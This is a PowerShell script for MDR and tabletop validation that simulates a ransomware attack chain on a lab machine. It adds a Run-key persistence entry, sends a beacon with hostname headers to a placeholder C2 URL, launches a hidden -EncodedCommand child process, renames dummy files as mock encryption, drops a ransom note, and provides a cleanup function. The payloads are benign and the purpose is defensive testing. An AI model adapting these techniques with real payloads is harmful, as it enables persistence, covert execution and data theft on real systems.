<# .SYNOPSIS Simulated malicious activity for tabletop / MDR validation. NON-DESTRUCTIVE but performs behaviors that often trigger detections: - Outbound HTTP (Invoke-WebRequest) - Registry Run key (persistence) - Child PowerShell with -EncodedCommand - Local file “encryption” (rename only) IMPORTANT: - Run ONLY on a lab/test machine with MDR enabled. - After the test, run the cleanup command (included at bottom of this file). #> # ---------------- CONFIGURATION ---------------- $RootPath = "C:\SimulatedIncident" $DataPath = Join-Path $RootPath "VictimData" $LogPath = Join-Path $RootPath "incident.log" $NotePath = Join-Path $RootPath "README_SIMULATED_RANSOM_NOTE.txt" $FakeC2Url = "http://example.com" # harmless domain, but HTTP + PowerShell + IWR looks bad $FakeVictimId = [guid]::NewGuid().ToString() # Registry persistence (lab only) $RunKeyPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" $RunValueName = "SimulatedMalware" # ---------------- HELPER FUNCTIONS ---------------- function Write-Log { param([string]$Message) $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" $line = "[$timestamp] $Message" Write-Host $line Add-Content -Path $LogPath -Value $line } function Initialize-Environment { Write-Host "=== SIMULATED MALWARE ACTIVITY (LAB ONLY) ===" Write-Host "This script is for MDR testing / tabletop exercises." Write-Host "" if (-not (Test-Path $RootPath)) { New-Item -ItemType Directory -Path $RootPath | Out-Null } if (-not (Test-Path $DataPath)) { New-Item -ItemType Directory -Path $DataPath | Out-Null # Dummy “user data” 1..5 | ForEach-Object { $dummyFile = Join-Path $DataPath ("Finance_Report_$($_).txt") "Dummy data file $($_) for MDR tabletop exercise." | Set-Content -Path $dummyFile } } "=== Simulated Incident Log ===" | Out-File -FilePath $LogPath -Encoding UTF8 Write-Log "Simulation started. Victim ID: $FakeVictimId" Write-Log "RootPath: $RootPath" } function Simulate-Reconnaissance { Write-Log "Phase 1: Reconnaissance - enumerating files under $DataPath." Start-Sleep -Seconds 1 $files = Get-ChildItem -Path $DataPath -File -ErrorAction SilentlyContinue foreach ($f in $files) { Write-Log "Found file: $($f.FullName) (Size: $($f.Length) bytes)" Start-Sleep -Milliseconds 200 } } function Simulate-Persistence { Write-Log "Phase 2: Persistence - creating HKCU Run key (lab only)." Start-Sleep -Seconds 1 $runCommand = 'powershell.exe -WindowStyle Hidden -NoProfile -Command "Write-Output ''Simulated autorun – tabletop only''"' try { if (-not (Test-Path $RunKeyPath)) { New-Item -Path $RunKeyPath -Force | Out-Null } New-ItemProperty -Path $RunKeyPath -Name $RunValueName -Value $runCommand -PropertyType String -Force | Out-Null Write-Log "Created Run key: $RunKeyPath\$RunValueName = $runCommand" } catch { Write-Log "Failed to create Run key: $($_.Exception.Message)" } } function Simulate-WebCallback { Write-Log "Phase 3: Outbound HTTP callback using Invoke-WebRequest." Start-Sleep -Seconds 1 try { Write-Log "Connecting to $FakeC2Url with dummy beacon data." $headers = @{ "X-Victim-ID" = $FakeVictimId "X-Host" = $env:COMPUTERNAME "X-Scenario" = "MDR-Tabletop" } # Harmless GET, just to generate suspicious telemetry. Invoke-WebRequest -Uri $FakeC2Url -Headers $headers -Method GET -UseBasicParsing -TimeoutSec 5 | Out-Null Write-Log "Invoke-WebRequest completed (or timed out) – this is expected." } catch { Write-Log "Invoke-WebRequest error (likely blocked or offline lab): $($_.Exception.Message)" } } function Simulate-EncodedCommandChild { Write-Log "Phase 4: Launching child PowerShell with -EncodedCommand." Start-Sleep -Seconds 1 # Benign payload, but encoded (common attacker pattern) $innerCmd = 'Start-Sleep -Seconds 5; Write-Output "Simulated malicious child – benign payload."' $bytes = [System.Text.Encoding]::Unicode.GetBytes($innerCmd) $b64 = [Convert]::ToBase64String($bytes) $args = "-NoProfile -WindowStyle Hidden -EncodedCommand $b64" Write-Log "Starting: powershell.exe $args" try { Start-Process -FilePath "powershell.exe" -ArgumentList $args -WindowStyle Hidden Write-Log "Child PowerShell started with -EncodedCommand." } catch { Write-Log "Failed to start child PowerShell: $($_.Exception.Message)" } } function Simulate-Encryption { Write-Log "Phase 5: Simulated file encryption (rename only)." Start-Sleep -Seconds 1 $files = Get-ChildItem -Path $DataPath -File -ErrorAction SilentlyContinue foreach ($f in $files) { $newName = $f.Name + ".simulated_encrypted" $newFullPath = Join-Path $DataPath $newName Write-Log "Renaming $($f.Name) -> $newName" Rename-Item -Path $f.FullName -NewName $newName -Force Start-Sleep -Milliseconds 200 } } function Drop-RansomNote { Write-Log "Phase 6: Dropping simulated ransom note." Start-Sleep -Seconds 1 $note = @" ************************************************************ SIMULATED RANSOMWARE INCIDENT - LAB ONLY ************************************************************ This host has been used in an MDR tabletop exercise. No real data has been encrypted or exfiltrated. All activity is simulated. Details: - Victim ID: $FakeVictimId - Hostname: $($env:COMPUTERNAME) - Date: $(Get-Date) If you are seeing something like this in PRODUCTION: 1) Immediately isolate affected endpoints from the network. 2) Notify the incident response / security team. 3) Follow the organization’s incident response procedures. For this EXERCISE: - Use your normal detection, triage, and communication playbooks. - Validate that your MDR provider detects: * PowerShell + Invoke-WebRequest * PowerShell child process with -EncodedCommand * Creation of a Run key in HKCU * Suspicious file renaming in user data paths ************************************************************ "@ $note | Set-Content -Path $NotePath -Encoding UTF8 Write-Log "Simulated ransom note written to: $NotePath" } function Complete-Simulation { Write-Log "Simulation complete. No destructive actions performed." Write-Host "" Write-Host "=== SIMULATION COMPLETE ===" Write-Host "Log file: $LogPath" Write-Host "Data folder: $DataPath" Write-Host "Ransom note: $NotePath" Write-Host "" Write-Host "REMEMBER TO RUN CLEANUP AFTER THE EXERCISE (see function below)." } function Cleanup-Simulation { <# Manually call: Cleanup-Simulation after the exercise to clean registry and rename files back. #> Write-Log "Running cleanup…" # Remove Run key try { if (Test-Path $RunKeyPath) { if (Get-ItemProperty -Path $RunKeyPath -Name $RunValueName -ErrorAction SilentlyContinue) { Remove-ItemProperty -Path $RunKeyPath -Name $RunValueName -ErrorAction SilentlyContinue Write-Log "Removed Run key: $RunKeyPath\$RunValueName" } } } catch { Write-Log "Failed to remove Run key: $($_.Exception.Message)" } # Rename .simulated_encrypted back to original name $encryptedFiles = Get-ChildItem -Path $DataPath -Filter "*.simulated_encrypted" -File -ErrorAction SilentlyContinue foreach ($f in $encryptedFiles) { $originalName = $f.Name -replace '\.simulated_encrypted$','' $originalPath = Join-Path $DataPath $originalName Write-Log "Restoring $($f.Name) -> $originalName" Rename-Item -Path $f.FullName -NewName $originalName -Force } Write-Log "Cleanup complete." } # ---------------- MAIN ---------------- Initialize-Environment Simulate-Reconnaissance Simulate-Persistence Simulate-WebCallback Simulate-EncodedCommandChild Simulate-Encryption Drop-RansomNote Complete-Simulation